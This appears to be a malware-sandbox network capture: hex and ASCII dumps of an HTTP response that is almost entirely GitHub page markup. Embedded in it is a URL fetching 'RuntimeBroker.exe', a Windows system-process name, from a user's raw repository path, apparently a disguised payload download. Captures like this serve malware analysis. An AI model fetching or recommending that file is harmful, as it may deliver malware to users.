                                                                                              2022-08-10 04:48:03 UTC439INData Raw: 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 52 75 6e 74 69 6d 65 42 72 6f 6b 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 54 6f 70 69 63 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 74 6f 70 69 63 73 22 3e 0a 20 20 20 20 20 20 54 6f 70 69 63 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71
                                                                                              Data Ascii: raw/main/04/RuntimeBroker.exe;ref_cta:Topics;&quot;}" href="/topics"> Topics</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&q
                                                                                              2022-08-10 04:48:03 UTC440INData Raw: 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 45 78 70 6c 6f 72 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 47 69 74 48 75 62 20 53 70 6f 6e 73 6f 72
                                                                                              Data Ascii: <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Explore&quot;,&quot;action&quot;:&quot;click to go to GitHub Sponsor
                                                                                              2022-08-10 04:48:03 UTC442INData Raw: 65 78 65 3b 72 65 66 5f 63 74 61 3a 54 68 65 20 52 65 61 64 4d 45 20 50 72 6f 6a 65 63 74 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 72 65 61 64 6d 65 22 3e 0a 20 20 20 20 20 20 54 68 65 20 52 65 61 64 4d 45 20 50 72 6f 6a 65 63 74 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f
                                                                                              Data Ascii: exe;ref_cta:The ReadME Project;&quot;}" href="/readme"> The ReadME Project</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quo
                                                                                              2022-08-10 04:48:03 UTC443INData Raw: 6d 22 3e 0a 20 20 20 20 20 20 47 69 74 48 75 62 20 45 64 75 63 61 74 69 6f 6e 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 45 78 70 6c 6f 72 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63
                                                                                              Data Ascii: m"> GitHub Education</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Explore&quot;,&quot;ac
                                                                                              2022-08-10 04:48:03 UTC444INData Raw: 79 20 64 65 74 61 69 6c 73 2d 72 65 73 65 74 20 77 69 64 74 68 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 3c 73 75 6d 6d 61 72 79 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 73 75 6d 6d 61 72 79 20 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 70 78 2d 30 20 70 79 2d 33 20 62 6f 72 64 65 72 2d 30 20 6e 6f 2d 77 72 61 70 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 3e 0a 20 20 20 20 20 20 20 20 50 72 69 63 69 6e 67 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 78 3d 22 30 22 20 79 3d 22 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 34 20 38 22 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 63 68 65 76 6f 6e 2d 64 6f
                                                                                              Data Ascii: y details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Pricing <svg x="0" y="0" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-do
                                                                                              2022-08-10 04:48:03 UTC446INData Raw: 6d 70 61 72 65 20 70 6c 61 6e 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 69 63 69 6e 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f
                                                                                              Data Ascii: mpare plans</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Pricing&quot;,&quot;action&quot;:&quo
                                                                                              2022-08-10 04:48:03 UTC447INData Raw: 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 27 22 60 20 2d 2d 3e 3c 21 2d 2d 20 3c 2f 74 65 78 74 61 72 65 61 3e 3c 2f 78 6d 70 3e 20 2d 2d 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 66 6f 72 6d 3e 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 69 74 65 22 20 64 61 74 61 2d 73 63 6f 70 65 2d 74 79 70 65 3d 22 55 73 65 72 22 20 64 61 74 61 2d 73 63 6f 70 65 2d 69 64 3d 22 39 32 35 38 38 38 39 30 22 20 64 61 74 61 2d 73 63 6f 70 65 64 2d 73 65 61 72 63 68 2d 75 72 6c 3d 22 2f 75 73 65 72 73 2f 67 6f 77 67 65 72 72 69 65 2f 73 65 61 72 63 68 22 20 64
                                                                                              Data Ascii: <div class="position-relative"> ... '"` -->... </textarea></xmp> --></option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="User" data-scope-id="92588890" data-scoped-search-url="/users/gowgerrie/search" d
                                                                                              2022-08-10 04:48:03 UTC448INData Raw: 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 66 35 59 42 64 4d 53 6f 6b 30 34 36 6f 75 59 44 2d 65 58 35 5a 4f 36 70 67 68 68 39 79 42 66 6d 55 6a 75 55 6a 30 6f 45 4d 77 35 50 6e 79 64 39 55 55 42 4e 79 66 6c 50 39 31 31 35 49 6d 64 41 42 41 36 32 62 38 77 47 69 71 4b 4f 51 68 59 32 34 36 35 6e 62 41 22 20 64 61 74 61 2d 63 73 72 66 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6a 73 2d 64 61 74 61 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 2d 63 73 72 66 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 74 79 70 65 2d 66 69 65 6c 64 22 20 6e 61 6d 65 3d 22 74 79 70 65 22 20 3e 0a 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: hidden" value="f5YBdMSok046ouYD-eX5ZO6pghh9yBfmUjuUj0oEMw5Pnyd9UUBNyflP9115ImdABA62b8wGiqKOQhY2465nbA" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" /> <input type="hidden" class="js-site-search-type-field" name="type" >
                                                                                              2022-08-10 04:48:03 UTC450INData Raw: 20 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 20 32 2e 35 41 32 2e 35 20 32 2e 35 20 30 20 30 31 34 2e 35 20 30 68 38 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2e 37 35 68 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 2d 31 2e 35 68 31 2e 37 35 76 2d 32 68 2d 38 61 31 20 31 20 30 20 30 30 2d 2e 37 31 34 20 31 2e 37 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 37 32 20 31 2e 30 35 41 32 2e 34 39 35 20 32 2e 34 39 35 20 30 20 30 31
                                                                                              Data Ascii: octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 01
                                                                                              2022-08-10 04:48:03 UTC451INData Raw: 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 31 2e 35 20 37 61 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 31 31 2d 38 2e 39 39 38 20 30 41 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 30 31 31 31 2e 35 20 37 7a 6d 2d 2e 38 32 20 34 2e 37 34 61 36 20 36 20 30 20 31 31 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 30 34 20 33 2e 30 34 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 6c 2d 33 2e 30 34 2d 33 2e 30 34 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 61 76 61 74 61 72 20 6d 72 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73
                                                                                              Data Ascii: shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-s
                                                                                              2022-08-10 04:48:03 UTC452INData Raw: 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 20 70 2d 32 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 22 3e 4e 6f 20 73 75 67 67 65 73 74 65 64 20 6a 75 6d 70 20 74 6f 20 72 65 73 75 6c 74 73 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 0a 3c 75 6c 20 69 64 3d 22 6a 75 6d 70 2d 74 6f 2d 72 65 73 75 6c 74 73 22 20 72 6f 6c 65 3d 22 6c 69 73 74 62 6f 78 22 20 63 6c 61 73 73 3d 22 70 2d 30 20 6d 2d 30 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 72 65 73 75 6c 74 73 2d 63 6f 6e 74 61 69 6e 65 72 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 72 65 73 75 6c 74 73
                                                                                              Data Ascii: ump-to-suggestion p-2"> <span class="color-fg-muted">No suggested jump to results</span> </li></ul><ul id="jump-to-results" role="listbox" class="p-0 m-0 js-navigation-container jump-to-suggestions-results-container js-jump-to-suggestions-results
                                                                                              2022-08-10 04:48:03 UTC454INData Raw: 50 72 6f 6a 65 63 74 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 2e 37 35 20 30 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 30 20 31 2e 37 35 76 31 32 2e 35 43 30 20 31
                                                                                              Data Ascii: Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 1
                                                                                              2022-08-10 04:48:03 UTC455INData Raw: 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 64 65 66 61 75 6c 74 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 74 68 69 73 20 75 73 65 72 22 3e 0a 20 20 20 20 20 20 20 20 49 6e 20 74 68 69 73 20 75 73 65 72 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
                                                                                              Data Ascii: ="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user"> In this user </span> <span class="
                                                                                              2022-08-10 04:48:03 UTC456INData Raw: 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 20 32 2e 35 41 32 2e 35 20 32 2e 35 20 30 20 30 31 34 2e 35 20 30 68 38 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2e 37 35 68 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 2d 31 2e 35 68 31 2e 37 35 76 2d 32 68 2d 38 61 31 20 31 20 30 20 30 30 2d 2e 37 31 34 20 31 2e 37 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 37 32 20 31 2e 30 35 41 32 2e 34 39 35 20 32 2e 34 39 35 20 30 20 30 31 32 20 31 31 2e 35 76 2d 39 7a 6d 31 30 2e 35 2d 31 56 39 68 2d 38 63 2d 2e 33 35 36 20 30 2d 2e 36 39 34 2e 30 37 34 2d 31 20 2e 32
                                                                                              Data Ascii: flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .2
                                                                                              2022-08-10 04:48:03 UTC458INData Raw: 4d 31 31 2e 35 20 37 61 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 31 31 2d 38 2e 39 39 38 20 30 41 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 30 31 31 31 2e 35 20 37 7a 6d 2d 2e 38 32 20 34 2e 37 34 61 36 20 36 20 30 20 31 31 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 30 34 20 33 2e 30 34 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 6c 2d 33 2e 30 34 2d 33 2e 30 34 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 61 76 61 74 61 72 20 6d 72 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 61 76 61 74 61 72 20 64 2d 6e 6f 6e 65 22 20 61 6c 74 3d 22 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22
                                                                                              Data Ascii: M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="
                                                                                              2022-08-10 04:48:03 UTC459INData Raw: 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 61 75 74 6f 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 70 61 74 68 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6f 70 65 6e 20 70 2d 32 22 20 68 72 65 66 3d 22 22 20 64 61 74 61 2d 69 74 65 6d 2d 74 79 70 65 3d 22 67 6c 6f 62 61 6c 5f 73 65 61 72 63 68 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6d 72 2d 32 20 74 65 78 74 2d 63 65 6e 74 65 72 20 64 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20
                                                                                              Data Ascii: e d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="global_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg
                                                                                              2022-08-10 04:48:03 UTC460INData Raw: 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 37 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2d 2e 37 35 7a 6d 2d 38 2e 32 35 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 35 20 30 76 35 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 35 20 30 76 2d 35 2e 35 7a 4d 38 20 33 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2e 37 35 76 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 33 2e 35 41 2e 37 35 2e 37 35 20 30 20 30 30 38 20 33 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 53 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20
                                                                                              Data Ascii: .75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img"
                                                                                              2022-08-10 04:48:03 UTC462INData Raw: 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 64 2d 6f 6e 2d 6e 61 76 2d 66 6f 63 75 73 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 6a 75 6d 70 22 3e 0a 20 20 20 20 20 20 4a 75 6d 70 20 74 6f 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                                                                              Data Ascii: div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle"></span> </div>
                                                                                              2022-08-10 04:48:03 UTC463INData Raw: 67 2d 62 6c 6f 63 6b 22 3e 0a 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 33 30 30 70 78 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 50 6f 70 6f 76 65 72 2d 6d 65 73 73 61 67 65 20 42 6f 78 20 50 6f 70 6f 76 65 72 2d 6d 65 73 73 61 67 65 2d 2d 74 6f 70 2d 72 69 67 68 74 20 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 70 2d 34 20 6d 74 2d 32 20 6d 78 2d 61 75 74 6f 20 74 65 78 74 2d 6c 65 66 74 20 63 6f 6c 6f 72 2d 73 68 61 64 6f 77 2d 6c 61 72 67 65 22 3e 0a 20 20 20 20 3c 68 34 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 6d 62 2d 32 22 3e 20 20 20 20 20 20
                                                                                              Data Ascii: g-block"> <div style="width: 300px" data-view-component="true" class="Popover-message Box Popover-message--top-right color-fg-default p-4 mt-2 mx-auto text-left color-shadow-large"> <h4 data-view-component="true" class="color-fg-default mb-2">
                                                                                              2022-08-10 04:48:03 UTC464INData Raw: 61 2d 73 75 70 70 6f 72 74 22 20 76 61 6c 75 65 3d 22 75 6e 6b 6e 6f 77 6e 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 72 65 74 75 72 6e 5f 74 6f 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 74 6f 22 20 76 61 6c 75 65 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 52 75 6e 74 69 6d 65 42 72 6f 6b 65 72 2e 65 78 65 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 6c 6c 6f 77 5f 73 69 67 6e 75 70 22 20 69 64 3d 22 61 6c 6c 6f 77 5f 